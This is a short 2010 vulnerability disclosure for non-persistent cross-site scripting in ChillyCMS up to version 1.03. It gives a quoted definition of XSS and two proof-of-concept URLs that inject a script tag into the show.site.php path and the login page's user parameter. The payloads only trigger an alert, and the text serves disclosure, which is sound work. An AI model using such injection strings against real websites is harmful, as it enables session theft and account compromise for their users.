ChillyCMS <= 1.03 Non Persistent XSS Vulnerabilities
Posted on 13 March 2010
==================================================== ChillyCMS <= 1.03 Non Persistent XSS Vulnerabilities ==================================================== # Description of the webapp: chillyCMS is a Content Management System. This is a software which allows you to create a website without any programming skills. # XSS by the Wikipedia. Cross-site scripting holes are web application vulnerabilities which allow attackers to bypass client-side security mechanisms normally imposed on web content by modern browsers. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access privileges to sensitive page content, session cookies, and a variety of other information maintained by the browser on behalf of the user. Cross-site scripting attacks are therefore a special case of code injection. # Proof of concept http://localhost/chillyCMS/core/show.site.php/>'><script>alert("EgoPL says: I'm a XSS"</script> http://localhost:80/chillyCMS/admin/login.site.php?user=>'><script>alert("EgoPL says: I'm a XSS"</script> # ~ - [ [ : Inj3ct0r : ] ]